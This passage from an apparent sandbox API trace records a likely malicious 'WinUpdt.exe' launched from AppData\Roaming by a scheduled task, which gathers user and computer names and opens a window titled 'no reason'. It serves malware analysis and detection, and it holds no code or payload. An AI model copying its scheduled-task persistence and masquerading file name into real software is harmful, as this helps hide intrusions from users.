(hHeap=0x660000, dwFlags=0x0, lpMem=0x675178) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675178) returned 0x14 [0069.417] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675178 | out: hHeap=0x660000) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] GetProcessHeap () returned 0x660000 [0069.417] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675198) returned 1 [0069.417] GetProcessHeap () returned 0x660000 [0069.418] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675198) returned 0x14 [0069.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675198 | out: hHeap=0x660000) returned 1 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674be8) returned 1 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674be8) returned 0x10 [0069.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674be8 | out: hHeap=0x660000) returned 1 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675118) returned 1 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675118) returned 0x14 [0069.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675118 | out: hHeap=0x660000) returned 1 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674ba0) returned 1 [0069.418] GetProcessHeap () returned 0x660000 [0069.418] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674ba0) returned 0x10 [0069.418] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ba0 | out: hHeap=0x660000) returned 1 [0069.418] exit (_Code=0) Thread: id = 97 os_tid = 0x8c4 Process: id = "7" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x76a3f000" os_pid = "0x588" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "6" os_parent_pid = "0x370" cmd_line = "taskeng.exe {4568F795-B030-4E70-B052-419BC1469E0B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 98 os_tid = 0x7b4 Thread: id = 99 os_tid = 0x5b4 Thread: id = 100 os_tid = 0x5b0 Thread: id = 101 os_tid = 0x59c Thread: id = 102 os_tid = 0x594 Thread: id = 103 os_tid = 0x58c Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xad16000" os_pid = "0x338" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bc99" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 116 os_tid = 0x600 Thread: id = 117 os_tid = 0x638 Thread: id = 118 os_tid = 0x554 Thread: id = 119 os_tid = 0x720 Thread: id = 120 os_tid = 0x668 Thread: id = 121 os_tid = 0x65c Thread: id = 122 os_tid = 0x144 Thread: id = 123 os_tid = 0x110 Thread: id = 124 os_tid = 0x3f0 Thread: id = 125 os_tid = 0x3ec Thread: id = 126 os_tid = 0x3e4 Thread: id = 127 os_tid = 0x3e0 Thread: id = 128 os_tid = 0x3d0 Thread: id = 129 os_tid = 0x3cc Thread: id = 130 os_tid = 0x398 Thread: id = 131 os_tid = 0x394 Thread: id = 132 os_tid = 0x384 Thread: id = 133 os_tid = 0x380 Thread: id = 134 os_tid = 0x368 Thread: id = 135 os_tid = 0x350 Thread: id = 136 os_tid = 0x33c Thread: id = 148 os_tid = 0xa38 Process: id = "9" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x75b4e000" os_pid = "0x5d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "6" os_parent_pid = "0x370" cmd_line = "taskeng.exe {8AFBAE0C-056F-4DBF-82E9-FBE5AC3AF8C2} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea31" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 154 os_tid = 0x5d4 Thread: id = 155 os_tid = 0x5ec Thread: id = 156 os_tid = 0x610 Thread: id = 157 os_tid = 0x640 Thread: id = 158 os_tid = 0x654 Thread: id = 159 os_tid = 0x658 Thread: id = 160 os_tid = 0x69c Thread: id = 292 os_tid = 0x668 Process: id = "10" image_name = "winupdt.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupdt.exe" page_root = "0x72e70000" os_pid = "0x6b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea31" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 222 os_tid = 0x6bc [0129.115] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0130.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x2ee998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0130.459] IsAppThemed () returned 0x1 [0130.461] CoTaskMemAlloc (cb=0xf0) returned 0x7495a0 [0130.461] CreateActCtxA (pActCtx=0x2eee94) returned 0x749794 [0130.569] CoTaskMemFree (pv=0x7495a0) [0130.635] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0130.636] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc11f [0130.648] GetUserNameW (in: lpBuffer=0x2eecd4, pcbBuffer=0x2eef4c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2eef4c) returned 1 [0130.651] GetComputerNameW (in: lpBuffer=0x2eecd4, nSize=0x2eef4c | out: lpBuffer="XDUWTFONO", nSize=0x2eef4c) returned 1 [0130.652] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x2eedcc, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0130.741] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0130.743] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74770000 [0130.816] AdjustWindowRectEx (in: lpRect=0x2eeeec, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50081 | out: lpRect=0x2eeeec) returned 1 [0130.819] GetCurrentProcess () returned 0xffffffff [0130.819] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x2eee04, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2eee04*=0x20c) returned 1 [0130.831] GetCurrentActCtx (in: lphActCtx=0x2eed64 | out: lphActCtx=0x2eed64*=0x0) returned 1 [0130.831] ActivateActCtx (in: hActCtx=0x749794, lpCookie=0x2eed74 | out: hActCtx=0x749794, lpCookie=0x2eed74) returned 1 [0130.831] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0130.837] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x745d0000 [0130.843] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76b80000 [0130.844] GetProcAddress (hModule=0x76b80000, lpProcName="DefWindowProcW") returned 0x779025dd [0130.844] GetStockObject (i=5) returned 0x1900015 [0130.866] GetModuleHandleW (lpModuleName=0x0) returned 0xde0000 [0130.867] CoTaskMemAlloc (cb=0x5c) returned 0x74cc68 [0130.867] RegisterClassW (lpWndClass=0x2eec1c) returned 0xc120 [0130.867] CoTaskMemFree (pv=0x74cc68) [0130.867] GetModuleHandleW (lpModuleName=0x0) returned 0xde0000 [0130.868] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xde0000, lpParam=0x0) returned 0x3001c [0130.868] SetWindowLongW (hWnd=0x3001c, nIndex=-4, dwNewLong=2005935581) returned 77465638 [0130.869] GetWindowLongW (hWnd=0x3001c, nIndex=-4) returned 2005935581 [0130.955] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ee52c | out: phkResult=0x2ee52c*=0x224) returned 0x0 [0130.955] RegQueryValueExW (in: hKey=0x224, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x2ee54c, lpData=0x0, lpcbData=0x2ee548*=0x0 | out: lpType=0x2ee54c*=0x0, lpData=0x0, lpcbData=0x2ee548*=0x0) returned 0x2 [0130.955] RegQueryValueExW (in: hKey=0x224, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x2ee54c, lpData=0x0, lpcbData=0x2ee548*=0x0 | out: lpType=0x2ee54c*=0x0, lpData=0x0, lpcbData=0x2ee548*=0x0) returned 0x2 [0130.955] RegCloseKey (hKey=0x224) returned 0x0 [0130.957] SetWindowLongW (hWnd=0x3001c, nIndex=-4, dwNewLong=77465678) returned 2005935581 [0130.957] GetWindowLongW (hWnd=0x3001c, nIndex=-4) returned 77465678 [0130.957] GetWindowLongW (hWnd=0x3001c, nIndex=-16) returned 113311744 [0130.958] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc121 [0130.958] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc122 [0130.959] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x3001c, Msg=0x81, wParam=0x0, lParam=0x2ee7f8) returned 0x1 [0130.959] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x3001c, Msg=0x83, wParam=0x0, lParam=0x2ee7e4) returned 0x0 [0130.959] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x3001c, Msg=0x1, wParam=0x0, lParam=0x2ee7f8) returned 0x0 [0130.959] GetClientRect (in: hWnd=0x3001c, lpRect=0x2ee560 | out: lpRect=0x2ee560) returned 1 [0130.959] GetWindowRect (in: hWnd=0x3001c, lpRect=0x2ee560 | out: lpRect=0x2ee560) returned 1 [0130.960] GetParent (hWnd=0x3001c) returned 0x0 [0130.960] DeactivateActCtx (dwFlags=0x0, ulCookie=0x15fb0001) returned 1 [0131.104] EtwEventRegister () returned 0x0 [0131.109] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74770000 [0131.109] AdjustWindowRectEx (in: lpRect=0x2eeea4, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x2eeea4) returned 1 [0131.109] GetSystemMetrics (nIndex=59) returned 1460 [0131.109] GetSystemMetrics (nIndex=60) returned 920 [0131.109] GetSystemMetrics (nIndex=34) returned 132 [0131.109] GetSystemMetrics (nIndex=35) returned 38 [0131.110] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74770000 [0131.110] AdjustWindowRectEx (in: lpRect=0x2eeda4, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x2eeda4) returned 1 [0131.114] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config", nBufferLength=0x105, lpBuffer=0x2ee7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config", lpFilePart=0x0) returned 0x40 [0131.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2eec3c) returned 1 [0131.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupdt.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x2eecb8 | out: lpFileInformation=0x2eecb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2eec38) returned 1 [0131.358] GetSystemMetrics (nIndex=11) returned 32 [0131.358] GetSystemMetrics (nIndex=12) returned 32 [0131.359] GetDC (hWnd=0x0) returned 0x290107d6 [0131.361] GetDeviceCaps (hdc=0x290107d6, index=12) returned 32 [0131.361] GetDeviceCaps (hdc=0x290107d6, index=14) returned 1 [0131.362] ReleaseDC (hWnd=0x0, hDC=0x290107d6) returned 1 [0131.362] CreateIconFromResourceEx (presbits=0x2229fc8, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x6010d [0131.368] CreateCompatibleDC (hdc=0x0) returned 0xfb01060f [0131.369] GetSystemDefaultLCID () returned 0x409 [0131.369] GetStockObject (i=17) returned 0x18a0025 [0131.371] GetObjectW (in: h=0x18a0025, c=92, pv=0x2eebfc | out: pv=0x2eebfc) returned 92 [0131.371] GetDC (hWnd=0x0) returned 0x290107d6 [0131.450] GdiplusStartup (in: token=0x166fc0, input=0x2ee1c8, output=0x2ee218 | out: token=0x166fc0, output=0x2ee218) returned 0x0 [0131.467] CoTaskMemAlloc (cb=0x5c) returned 0x74c928 [0131.468] GdipCreateFontFromLogfontW (hdc=0x290107d6, logfont=0x74c928, font=0x2eecc4) returned 0x0 [0131.575] CoTaskMemFree (pv=0x74c928) [0131.575] CoTaskMemAlloc (cb=0x5c) returned 0x74c928 [0131.575] CoTaskMemFree (pv=0x74c928) [0131.576] CoTaskMemAlloc (cb=0x5c) returned 0x74c928 [0131.576] CoTaskMemFree (pv=0x74c928) [0131.576] GdipGetFontUnit (font=0x7322230, unit=0x2eec90) returned 0x0 [0131.576] GdipGetFontSize (font=0x7322230, size=0x2eec94) returned 0x0 [0131.576] GdipGetFontStyle (font=0x7322230, style=0x2eec8c) returned 0x0 [0131.576] GdipGetFamily (font=0x7322230, family=0x2eec88) returned 0x0 [0131.577] GdipGetFontSize (font=0x7322230, size=0x222b56c) returned 0x0 [0131.577] ReleaseDC (hWnd=0x0, hDC=0x290107d6) returned 1 [0131.577] GetDC (hWnd=0x0) returned 0x5010162 [0131.578] GdipCreateFromHDC (hdc=0x5010162, graphics=0x2eecb0) returned 0x0 [0131.579] GdipGetDpiY (graphics=0x71bfcf0, dpi=0x222b674) returned 0x0 [0131.579] GdipGetFontHeight (font=0x7322230, graphics=0x71bfcf0, height=0x2eeca8) returned 0x0 [0131.579] GdipGetEmHeight (family=0x732f6b8, style=0, EmHeight=0x2eecb0) returned 0x0 [0131.579] GdipGetLineSpacing (family=0x732f6b8, style=0, LineSpacing=0x2eecb0) returned 0x0 [0131.580] GdipDeleteGraphics (graphics=0x71bfcf0) returned 0x0 [0131.580] ReleaseDC (hWnd=0x0, hDC=0x5010162) returned 1 [0131.580] GdipCreateFont (fontFamily=0x732f6b8, emSize=0x41040000, style=0, unit=0x3, font=0x222b634) returned 0x0 [0131.580] GdipGetFontSize (font=0x7212940, size=0x222b638) returned 0x0 [0131.580] GdipDeleteFont (font=0x7322230) returned 0x0 [0131.581] GetDC (hWnd=0x0) returned 0x5010162 [0131.581] GdipCreateFromHDC (hdc=0x5010162, graphics=0x2eecd4) returned 0x0 [0131.581] CoTaskMemAlloc (cb=0x5c) returned 0x74c928 [0131.582] GdipGetLogFontW (font=0x7212940, graphics=0x71bfcf0, logfontW=0x74c928) returned 0x0 [0131.582] CoTaskMemFree (pv=0x74c928) [0131.582] CoTaskMemAlloc (cb=0x5c) returned 0x74c928 [0131.582] CoTaskMemFree (pv=0x74c928) [0131.582] CoTaskMemAlloc (cb=0x5c) returned 0x74c928 [0131.582] CoTaskMemFree (pv=0x74c928) [0131.582] GdipDeleteGraphics (graphics=0x71bfcf0) returned 0x0 [0131.582] ReleaseDC (hWnd=0x0, hDC=0x5010162) returned 1 [0131.583] CoTaskMemAlloc (cb=0x5c) returned 0x74c928 [0131.583] CreateFontIndirectW (lplf=0x74c928) returned 0xa0a01eb [0131.583] CoTaskMemFree (pv=0x74c928) [0131.583] SelectObject (hdc=0xfb01060f, h=0xa0a01eb) returned 0x18a002e [0131.583] GetTextMetricsW (in: hdc=0xfb01060f, lptm=0x2eede0 | out: lptm=0x2eede0) returned 1 [0131.583] GetTextExtentPoint32W (in: hdc=0xfb01060f, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x222b890 | out: psizl=0x222b890) returned 1 [0131.585] SelectObject (hdc=0xfb01060f, h=0x18a002e) returned 0xa0a01eb [0131.586] DeleteDC (hdc=0xfb01060f) returned 1 [0131.586] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74770000 [0131.586] AdjustWindowRectEx (in: lpRect=0x2eeb48, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x2eeb48) returned 1 [0131.586] AdjustWindowRectEx (in: lpRect=0x2eed6c, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x2eed6c) returned 1 [0131.586] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74770000 [0131.586] AdjustWindowRectEx (in: lpRect=0x2eeac0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x2eeac0) returned 1 [0131.586] AdjustWindowRectEx (in: lpRect=0x2eeba4, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x2eeba4) returned 1 [0131.589] GetSystemMetrics (nIndex=59) returned 1460 [0131.589] GetSystemMetrics (nIndex=60) returned 920 [0131.589] GetSystemMetrics (nIndex=34) returned 132 [0131.589] GetSystemMetrics (nIndex=35) returned 38 [0131.589] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74770000 [0131.589] AdjustWindowRectEx (in: lpRect=0x2eea50, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x2eea50) returned 1 [0131.589] AdjustWindowRectEx (in: lpRect=0x2eeb18, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x2eeb18) returned 1 [0131.589] GetCurrentActCtx (in: lphActCtx=0x2eef08 | out: lphActCtx=0x2eef08*=0x0) returned 1 [0131.589] ActivateActCtx (in: hActCtx=0x749794, lpCookie=0x2eef18 | out: hActCtx=0x749794, lpCookie=0x2eef18) returned 1 [0131.591] GetCurrentActCtx (in: lphActCtx=0x2eed28 | out: lphActCtx=0x2eed28*=0x749794) returned 1 [0131.591] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x745d0000 [0131.591] AdjustWindowRectEx (in: lpRect=0x2eec88, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x2eec88) returned 1 [0131.591] GetModuleHandleW (lpModuleName=0x0) returned 0xde0000 [0131.591] CreateWindowExW (dwExStyle=0x50080, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName="no reason", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=164, nHeight=91, hWndParent=0x0, hMenu=0x0, hInstance=0xde0000, lpParam=0x0) returned 0x1015a [0131.591] SetWindowLongW (hWnd=0x1015a, nIndex=-4, dwNewLong=2005935581) returned 77465638 [0131.592] GetWindowLongW (hWnd=0x1015a, nIndex=-4) returned 2005935581 [0131.592] SetWindowLongW (hWnd=0x1015a, nIndex=-4, dwNewLong=77465758) returned 2005935581 [0131.592] GetWindowLongW (hWnd=0x1015a, nIndex=-4) returned 77465758 [0131.592] GetWindowLongW (hWnd=0x1015a, nIndex=-16) returned 114229248 [0131.592] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x81, wParam=0x0, lParam=0x2ee7bc) returned 0x1 [0131.593] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x83, wParam=0x0, lParam=0x2ee7a8) returned 0x0 [0131.595] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x1, wParam=0x0, lParam=0x2ee7bc) returned 0x0 [0131.595] GetClientRect (in: hWnd=0x1015a, lpRect=0x2ee4f4 | out: lpRect=0x2ee4f4) returned 1 [0131.595] GetWindowRect (in: hWnd=0x1015a, lpRect=0x2ee4f4 | out: lpRect=0x2ee4f4) returned 1 [0131.596] SetWindowTextW (hWnd=0x1015a, lpString="no reason") returned 1 [0131.596] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xc, wParam=0x0, lParam=0x22164f0) returned 0x1 [0131.607] GetUserObjectInformationA (in: hObj=0x5c, nIndex=1, pvInfo=0x222be2c, nLength=0xc, lpnLengthNeeded=0x2ee3f4 | out: pvInfo=0x222be2c, lpnLengthNeeded=0x2ee3f4) returned 1 [0131.610] SetConsoleCtrlHandler (HandlerRoutine=0x49e08c6, Add=1) returned 1 [0131.611] GetModuleHandleW (lpModuleName=0x0) returned 0xde0000 [0131.611] GetModuleHandleW (lpModuleName=0x0) returned 0xde0000 [0131.612] GetClassInfoW (in: hInstance=0xde0000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x222be90 | out: lpWndClass=0x222be90) returned 0 [0131.613] CoTaskMemAlloc (cb=0x58) returned 0x72eda8 [0131.613] RegisterClassW (lpWndClass=0x2ee344) returned 0xc124 [0131.614] CoTaskMemFree (pv=0x72eda8) [0131.614] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xde0000, lpParam=0x0) returned 0x1015e [0131.615] NtdllDefWindowProc_W () returned 0x0 [0131.615] NtdllDefWindowProc_W () returned 0x0 [0131.615] NtdllDefWindowProc_W () returned 0x0 [0131.615] NtdllDefWindowProc_W () returned 0x0 [0131.621] GetStartupInfoW (in: lpStartupInfo=0x222c210 | out: lpStartupInfo=0x222c210*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0131.621] GetParent (hWnd=0x1015a) returned 0x0 [0131.621] SetWindowLongW (hWnd=0x1015a, nIndex=-8, dwNewLong=0) returned 0 [0131.621] GetSystemMetrics (nIndex=49) returned 16 [0131.621] GetSystemMetrics (nIndex=50) returned 16 [0131.621] CreateIconFromResourceEx (presbits=0x222c290, dwResSize=0x468, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x10155 [0131.622] SendMessageW (hWnd=0x1015a, Msg=0x80, wParam=0x0, lParam=0x10155) returned 0x0 [0131.622] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x80, wParam=0x0, lParam=0x10155) returned 0x0 [0131.625] SendMessageW (hWnd=0x1015a, Msg=0x80, wParam=0x1, lParam=0x6010d) returned 0x0 [0131.625] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0x80, wParam=0x1, lParam=0x6010d) returned 0x0 [0131.652] GetSystemMenu (hWnd=0x1015a, bRevert=0) returned 0x1015d [0131.653] GetWindowPlacement (in: hWnd=0x1015a, lpwndpl=0x2eed38 | out: lpwndpl=0x2eed38) returned 1 [0131.653] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0131.653] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0131.653] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0131.653] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf120, uEnable=0x1) returned 0 [0131.653] EnableMenuItem (hMenu=0x1015d, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0131.653] GetClientRect (in: hWnd=0x1015a, lpRect=0x2eed7c | out: lpRect=0x2eed7c) returned 1 [0131.653] GetClientRect (in: hWnd=0x1015a, lpRect=0x2eecdc | out: lpRect=0x2eecdc) returned 1 [0131.653] GetWindowRect (in: hWnd=0x1015a, lpRect=0x2eecdc | out: lpRect=0x2eecdc) returned 1 [0131.653] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x745d0000 [0131.653] GetWindowLongW (hWnd=0x1015a, nIndex=-16) returned 114229248 [0131.654] GetWindowTextLengthW (hWnd=0x1015a) returned 9 [0131.654] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0131.654] GetSystemMetrics (nIndex=42) returned 0 [0131.654] GetWindowTextW (in: hWnd=0x1015a, lpString=0x2eec74, nMaxCount=10 | out: lpString="no reason") returned 9 [0131.654] CallWindowProcW (lpPrevWndFunc=0x779025dd, hWnd=0x1015a, Msg=0xd, wParam=0xa, lParam=0x2eec74) returned 0x9 [0131.654] GetWindowTextLengthW (hWnd=0x1015a) returned 9 [0131.655] CallWindowProcW (lpPrevWndFunc=0x779025dd, 